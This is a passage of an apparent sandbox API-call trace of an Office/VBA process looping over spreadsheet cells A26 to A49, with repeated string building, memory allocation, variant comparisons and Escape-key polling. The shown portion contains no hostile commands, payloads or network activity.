(pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.366] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.402] VarBstrCat (in: bstrLeft="A", bstrRight="26", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.402] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.402] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.402] longjmp () [0158.404] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.404] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.444] VarBstrCat (in: bstrLeft="A", bstrRight="27", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.444] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.444] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.444] longjmp () [0158.446] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.446] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.486] GetAsyncKeyState (vKey=27) returned 0 [0158.486] VarBstrCat (in: bstrLeft="A", bstrRight="28", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.486] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.486] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.487] longjmp () [0158.488] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.488] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.529] VarBstrCat (in: bstrLeft="A", bstrRight="29", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.530] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.530] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.530] longjmp () [0158.531] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.531] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.587] VarBstrCat (in: bstrLeft="A", bstrRight="30", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.588] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.588] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.588] longjmp () [0158.590] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.590] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.627] VarBstrCat (in: bstrLeft="A", bstrRight="31", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.627] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.627] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.627] longjmp () [0158.628] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.628] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.666] GetAsyncKeyState (vKey=27) returned 0 [0158.667] VarBstrCat (in: bstrLeft="A", bstrRight="32", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.667] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.667] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.667] longjmp () [0158.668] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.668] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.708] VarBstrCat (in: bstrLeft="A", bstrRight="33", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.708] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.708] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.708] longjmp () [0158.709] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.709] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.775] VarBstrCat (in: bstrLeft="A", bstrRight="34", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.775] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.776] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.776] longjmp () [0158.777] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.777] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.820] VarBstrCat (in: bstrLeft="A", bstrRight="35", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.821] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.821] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.821] longjmp () [0158.822] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.822] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.867] GetAsyncKeyState (vKey=27) returned 0 [0158.867] VarBstrCat (in: bstrLeft="A", bstrRight="36", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.867] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.867] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.867] longjmp () [0158.868] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.868] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.946] VarBstrCat (in: bstrLeft="A", bstrRight="37", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.947] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.947] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.947] longjmp () [0158.948] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.948] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.001] VarBstrCat (in: bstrLeft="A", bstrRight="38", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.001] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.001] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.002] longjmp () [0159.003] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.003] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.060] VarBstrCat (in: bstrLeft="A", bstrRight="39", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.061] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.061] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.061] longjmp () [0159.062] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.062] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.159] GetAsyncKeyState (vKey=27) returned 0 [0159.159] VarBstrCat (in: bstrLeft="A", bstrRight="40", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.161] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.161] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.161] longjmp () [0159.163] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.163] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.234] VarBstrCat (in: bstrLeft="A", bstrRight="41", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.235] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.235] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.235] longjmp () [0159.236] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.236] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.349] GetAsyncKeyState (vKey=27) returned 0 [0159.349] VarBstrCat (in: bstrLeft="A", bstrRight="42", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.350] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.350] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.350] longjmp () [0159.351] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.351] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.415] VarBstrCat (in: bstrLeft="A", bstrRight="43", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.415] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.415] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.415] longjmp () [0159.417] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.417] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.542] GetAsyncKeyState (vKey=27) returned 0 [0159.542] VarBstrCat (in: bstrLeft="A", bstrRight="44", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.542] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.542] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.542] longjmp () [0159.543] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.543] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.609] VarBstrCat (in: bstrLeft="A", bstrRight="45", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.610] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.610] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.610] longjmp () [0159.611] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.611] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.674] VarBstrCat (in: bstrLeft="A", bstrRight="46", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.674] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0159.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.674] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0159.674] longjmp () [0159.675] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.676] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.776] GetAsyncKeyState (vKey=27) returned 0 [0159.777] VarBstrCat (in: bstrLeft="A", bstrRight="47", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.777] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0x9bcd6a0 [0159.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x9bcd6a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.777] IMalloc:Free (This=0x7fefecb5380, pv=0x9bcd6a0) [0159.777] longjmp () [0159.778] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.778] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.844] VarBstrCat (in: bstrLeft="A", bstrRight="48", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.845] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0x9bcd6a0 [0159.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x9bcd6a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.845] IMalloc:Free (This=0x7fefecb5380, pv=0x9bcd6a0) [0159.845] longjmp () [0159.846] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0159.846] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0159.911] VarBstrCat (in: bstrLeft="A", bstrRight="49", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0159.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0159.912] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0x9bcd6a0 [0159.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x9bcd6a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0159.912] IMalloc:Free (This=0x7fefecb5380, pv=0x9bcd6a0) [0159.912] longjmp () [0159.913] GetAsyncKeyState (vKey=27) returned 0 [0159.913] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 